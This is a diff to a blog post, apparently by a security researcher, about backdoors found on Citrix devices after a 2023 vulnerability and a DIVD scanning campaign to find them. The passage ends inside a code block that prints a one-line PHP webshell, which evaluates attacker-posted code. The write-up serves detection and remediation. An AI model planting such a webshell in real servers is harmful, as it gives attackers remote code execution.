Maximand/Maximand.github.io/_posts/2025-06-14-patching-is-not-enough-persistent-backdoors-after-the-fix.md

 To support remediation at scale, DIVD, in collaboration with Fox-IT, initiated an internet-wide scan campaign under investigation [DIVD-2023-00030](https://csirt.divd.nl/cases/DIVD-2023-00030/) for the vulnerability and [DIVD-2023-00033](https://csirt.divd.nl/cases/DIVD-2023-00033/) for the backdoor campaign.
 This was one of the first cases where I experienced how quickly attackers can establish persistence before patches are even applied.

 ### Scanning for the Backdoors
-The first backdoor is publicly attributed to criminals.
-While there was nation state activity around this vulnerability, [with a suspected Chinese threat actor spreading implants (dubbed SECRETSAUCE)](https://cloud.google.com/blog/topics/threat-intelligence/citrix-zero-day-espionage/), our investigation focused on the criminal shell.
+The first vulnerability had significant activity around it and many different backdoors.
+While there was nation state activity around this vulnerability, [with a suspected Chinese threat actor spreading implants (dubbed SECRETSAUCE)](https://cloud.google.com/blog/topics/threat-intelligence/citrix-zero-day-espionage/), it is unclear whether the shell we investigated was criminal or nation-state.
 On July 20th, 2023, implants started appearing.
 While the nation state shells appeared under the `/var/vpn/themes` directory, were asymmetric, and did not contain any clear mistakes, the criminal webshell did and started appearing in the `/logon/LogonPoint/uiareas` directory.

 ```php
 <?php http_response_code(201); @eval($_POST[5]);